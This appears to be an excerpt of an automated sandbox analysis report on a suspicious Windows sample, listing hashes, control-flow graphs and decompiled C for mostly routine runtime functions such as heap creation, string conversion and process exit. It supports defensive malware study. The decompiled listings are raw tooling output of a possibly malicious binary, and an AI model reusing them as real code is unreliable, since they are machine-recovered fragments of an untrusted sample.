                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction ID: 50a69a1897905be839dee4114046aa7fbd111acc4b86be4bafed903a212d10f9
                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 41525974A01229DFDB64CF58C984BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 240 4018f0-4018fa 241 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 240->241 242 4018fc-401900 240->242 245 401940-401949 GetLastError 241->245 246 401996-40199a 241->246 247 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 245->247 248 40198d-40198f 245->248 247->248 248->246 250 401991 call 401030 248->250 250->246
                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                      			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                                                                                      0x004018f0
                                                                                                                                                                      0x004018f2
                                                                                                                                                                      0x004018f6
                                                                                                                                                                      0x004018fa
                                                                                                                                                                      0x00401917
                                                                                                                                                                      0x0040191a
                                                                                                                                                                      0x0040192f
                                                                                                                                                                      0x00401939
                                                                                                                                                                      0x0040193b
                                                                                                                                                                      0x0040193e
                                                                                                                                                                      0x00401940
                                                                                                                                                                      0x00401949
                                                                                                                                                                      0x0040195e
                                                                                                                                                                      0x0040196b
                                                                                                                                                                      0x00401980
                                                                                                                                                                      0x0040198a
                                                                                                                                                                      0x0040198c
                                                                                                                                                                      0x0040198c
                                                                                                                                                                      0x0040198f
                                                                                                                                                                      0x00401991
                                                                                                                                                                      0x00401991
                                                                                                                                                                      0x0040198f
                                                                                                                                                                      0x0040199a
                                                                                                                                                                      0x004018fc
                                                                                                                                                                      0x004018fc
                                                                                                                                                                      0x00401900
                                                                                                                                                                      0x00401900

                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 253 40af66-40af6e 254 40af7d-40af88 call 40b84d 253->254 257 40af70-40af7b call 40d2e3 254->257 258 40af8a-40af8b 254->258 257->254 261 40af8c-40af98 257->261 262 40afb3-40afca call 40af49 call 40cd39 261->262 263 40af9a-40afb2 call 40aefc call 40d2bd 261->263 263->262
                                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                                      			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

















                                                                                                                                                                      0x0040af66
                                                                                                                                                                      0x0040af66
                                                                                                                                                                      0x0040af69
                                                                                                                                                                      0x0040af7d
                                                                                                                                                                      0x0040af80
                                                                                                                                                                      0x0040af88
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040af73
                                                                                                                                                                      0x0040af79
                                                                                                                                                                      0x0040af7b
                                                                                                                                                                      0x0040af8c
                                                                                                                                                                      0x0040af98
                                                                                                                                                                      0x0040af9a
                                                                                                                                                                      0x0040af9a
                                                                                                                                                                      0x0040afa3
                                                                                                                                                                      0x0040afad
                                                                                                                                                                      0x0040afb2
                                                                                                                                                                      0x0040afb7
                                                                                                                                                                      0x0040afc5
                                                                                                                                                                      0x0040afca
                                                                                                                                                                      0x0040afd0
                                                                                                                                                                      0x0040aec2
                                                                                                                                                                      0x0040b6b5
                                                                                                                                                                      0x0040b6b7
                                                                                                                                                                      0x0040b6bc
                                                                                                                                                                      0x0040b6c1
                                                                                                                                                                      0x0040b6c4
                                                                                                                                                                      0x0040b6c6
                                                                                                                                                                      0x0040b6c8
                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                      0x0040b714
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040b6d1
                                                                                                                                                                      0x0040b6d3
                                                                                                                                                                      0x0040b6d9
                                                                                                                                                                      0x0040b6de
                                                                                                                                                                      0x0040b6e4
                                                                                                                                                                      0x0040b6e7
                                                                                                                                                                      0x0040b6e9
                                                                                                                                                                      0x0040b6eb
                                                                                                                                                                      0x0040b6ec
                                                                                                                                                                      0x0040b6ed
                                                                                                                                                                      0x0040b6f3
                                                                                                                                                                      0x0040b6f4
                                                                                                                                                                      0x0040b6fb
                                                                                                                                                                      0x0040b700
                                                                                                                                                                      0x0040b704
                                                                                                                                                                      0x0040b706
                                                                                                                                                                      0x0040b715
                                                                                                                                                                      0x0040b723
                                                                                                                                                                      0x0040b725
                                                                                                                                                                      0x0040b727
                                                                                                                                                                      0x0040b73a
                                                                                                                                                                      0x0040b73c
                                                                                                                                                                      0x0040b725
                                                                                                                                                                      0x0040b704
                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                      0x0040b742
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040af7b
                                                                                                                                                                      0x0040af8b
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02410E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 289 2410e0f-2410e24 SetErrorMode * 2 290 2410e26 289->290 291 2410e2b-2410e2c 289->291 290->291
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,02410223,?,?), ref: 02410E19
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,02410223,?,?), ref: 02410E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction ID: d5d02a56bf8b6e9a19f7d75435f615235b2387f678e84e13562c1ad7ea62610a
                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction Fuzzy Hash: 18D0123114522877DB002A95DC09BCE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 292 40e7ee-40e7f6 call 40e7c3 294 40e7fb-40e7ff ExitProcess 292->294
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}



                                                                                                                                                                      0x0040e7f6
                                                                                                                                                                      0x0040e7ff

                                                                                                                                                                      APIs
                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02569E58 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 295 2569e58-256be12 call 2569d38 700 256be12 call 256cde6 295->700 701 256be12 call 256cdd8 295->701 684 256be18-256be20 686 256be22-256be39 684->686 687 256be8a-256be8d 684->687 690 256be5a 686->690 691 256be3b-256be44 686->691 692 256be5d-256be6d 690->692 693 256be46-256be49 691->693 694 256be4b-256be4e 691->694 697 256be6f-256be79 692->697 698 256be7b 692->698 695 256be58 693->695 694->695 695->692 699 256be82-256be85 697->699 698->699 699->687 700->684 701->684
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 82adba93787c6356a147038b67f78fd1df354a8d5879594a6d9754da6230a8ba
                                                                                                                                                                      • Instruction ID: 85a556673fa5b60c22a9eb5c52d8f4e92c8ba1b1fbfcbdacf7e4bf6ea470f2f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 82adba93787c6356a147038b67f78fd1df354a8d5879594a6d9754da6230a8ba
                                                                                                                                                                      • Instruction Fuzzy Hash: FD13FE7CA05204EFCB16AB60D951D9DB732FF89706B10846ADC112BFA8CA3BD952DF11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02569E4B Relevance: 2.0, Instructions: 1972COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 702 2569e4b-256bdf8 1088 256bdff-256be12 call 2569d38 702->1088 1108 256be12 call 256cde6 1088->1108 1109 256be12 call 256cdd8 1088->1109 1092 256be18-256be20 1094 256be22-256be39 1092->1094 1095 256be8a-256be8d 1092->1095 1098 256be5a 1094->1098 1099 256be3b-256be44 1094->1099 1100 256be5d-256be6d 1098->1100 1101 256be46-256be49 1099->1101 1102 256be4b-256be4e 1099->1102 1105 256be6f-256be79 1100->1105 1106 256be7b 1100->1106 1103 256be58 1101->1103 1102->1103 1103->1100 1107 256be82-256be85 1105->1107 1106->1107 1107->1095 1108->1092 1109->1092
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f5f1165dcfcc637b53214f11badf2d00991cab2046586b2da30ee033c87497f3
                                                                                                                                                                      • Instruction ID: 606a865635d06b691f16d647575bf9c1948b7e14dc09b7295918917517bbcf16
                                                                                                                                                                      • Opcode Fuzzy Hash: f5f1165dcfcc637b53214f11badf2d00991cab2046586b2da30ee033c87497f3
                                                                                                                                                                      • Instruction Fuzzy Hash: E313FE7CA05204EFCB16AB60D951D9DB732FF89706B10846ADC112BFA8CA3BD952DF11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256F918 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1110 256f918-256f98f 1117 256f991-256f994 1110->1117 1118 256f99c-256f9f2 1110->1118 1117->1118 1125 256f9f4-256f9ff 1118->1125 1126 256fa01-256fa37 1118->1126 1125->1126 1132 256fd0c-256fd1c 1126->1132 1133 256fa3d-256fa46 1126->1133 1138 256fd25-256fd31 1132->1138 1134 256fa55-256fa61 1133->1134 1135 256fa48-256fa4d 1133->1135 1136 256fd76-256fd9d 1134->1136 1137 256fa67-256faa5 call 256eba8 1134->1137 1135->1134 1145 256fda7-256fdbd 1136->1145 1146 256fd9f-256fda5 1136->1146 1159 256faab-256facb 1137->1159 1160 256fca9-256fccb 1137->1160 1142 256fd33-256fd42 1138->1142 1143 256fd5d-256fd67 1138->1143 1142->1143 1151 256fd44-256fd54 1142->1151 1154 256fdc5-256fdc9 1145->1154 1155 256fdbf 1145->1155 1146->1145 1151->1143 1157 256fddc-256fdf9 1154->1157 1158 256fdcb-256fdd4 1154->1158 1155->1154 1158->1157 1169 256fad1-256fae1 1159->1169 1170 256fc98-256fca3 1159->1170 1163 256fcd6 1160->1163 1164 256fccd 1160->1164 1163->1132 1164->1163 1171 256faf4-256fb18 1169->1171 1172 256fae3-256faec 1169->1172 1170->1159 1170->1160 1178 256fb1a-256fb4a 1171->1178 1179 256fb59-256fb6c 1171->1179 1172->1171 1186 256fb71-256fb7b 1178->1186 1187 256fb4c-256fb57 1178->1187 1180 256fc76-256fc7a 1179->1180 1182 256fc85 1180->1182 1183 256fc7c 1180->1183 1182->1170 1183->1182 1188 256fb86-256fba1 1186->1188 1189 256fb7d-256fb83 1186->1189 1187->1178 1187->1179 1193 256fbb4-256fbca 1188->1193 1194 256fba3-256fbac 1188->1194 1189->1188 1197 256fbcc-256fbd5 1193->1197 1198 256fbdd-256fbf6 1193->1198 1194->1193 1197->1198 1201 256fbf8-256fc01 1198->1201 1202 256fc09-256fc6f 1198->1202 1201->1202 1202->1180
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8q
                                                                                                                                                                      • API String ID: 0-596622023
                                                                                                                                                                      • Opcode ID: 0c1b04ae5e79160cd9d47b9a9d296b8583a09ec4a6881ac274ee33127e63f400
                                                                                                                                                                      • Instruction ID: 1d92dd69f61cf05ed3989292f51c041566c6a5164b86a9716b4b706e38b6efa7
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c1b04ae5e79160cd9d47b9a9d296b8583a09ec4a6881ac274ee33127e63f400
                                                                                                                                                                      • Instruction Fuzzy Hash: DDE13D34A00209DFCB14DF69E998A6DBBB2FF88310F148869E8169B765DB31EC45CF50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02560490 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1211 2560490-25604d9 1216 25604e5-25604e8 1211->1216 1217 25604db-25604dd 1211->1217 1218 25607f3-2560801 1216->1218 1219 25604ee-256053c 1216->1219 1217->1218 1220 25604e3 1217->1220 1228 25605ae-2560618 1219->1228 1229 256053e-2560570 1219->1229 1220->1219 1248 2560631 1228->1248 1249 256061a-256062f 1228->1249 1238 2560572-2560574 1229->1238 1239 256057c-256057f 1229->1239 1238->1218 1240 256057a 1238->1240 1239->1218 1241 2560585-25605a8 1239->1241 1240->1241 1241->1228 1251 2560639 1248->1251 1253 2560644-256065a 1249->1253 1251->1253 1255 2560660-2560674 1253->1255 1256 25606fd-2560719 1253->1256 1259 2560676-256067e 1255->1259 1260 25606ec-25606f0 1255->1260 1264 2560790-25607c1 1256->1264 1265 256071b-2560726 1256->1265 1263 2560684-256068c 1259->1263 1260->1255 1262 25606f6 1260->1262 1262->1256 1263->1256 1266 256068e-25606b4 1263->1266 1279 25607eb-25607f2 1264->1279 1270 2560750-2560788 1265->1270 1271 2560728-256074e 1265->1271 1281 25606b6-25606e2 1266->1281 1282 25606e4-25606e8 1266->1282 1286 256078e 1270->1286 1271->1270 1281->1256 1282->1266 1284 25606ea 1282->1284 1284->1256 1286->1279
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: *p^
                                                                                                                                                                      • API String ID: 0-1375670925
                                                                                                                                                                      • Opcode ID: a21eefd5368f95283370a7a43c13890e8c474e1c8551ba1cc10ae0631ef0c7ee
                                                                                                                                                                      • Instruction ID: bbac39e85148f048475f71dff5379ff53cd45628c1f874a56f13dffa07148da1
                                                                                                                                                                      • Opcode Fuzzy Hash: a21eefd5368f95283370a7a43c13890e8c474e1c8551ba1cc10ae0631ef0c7ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 63B1E7387505108FC754DF29D998E2ABBE2FF88B14B1585A9E50ACB3B5DB31EC05CB80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1289 40d534-40d556 HeapCreate 1290 40d558-40d559 1289->1290 1291 40d55a-40d563 1289->1291
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                                      0x0040d549
                                                                                                                                                                      0x0040d54f
                                                                                                                                                                      0x0040d556
                                                                                                                                                                      0x0040d55d
                                                                                                                                                                      0x0040d563
                                                                                                                                                                      0x0040d559
                                                                                                                                                                      0x0040d559
                                                                                                                                                                      0x0040d559

                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
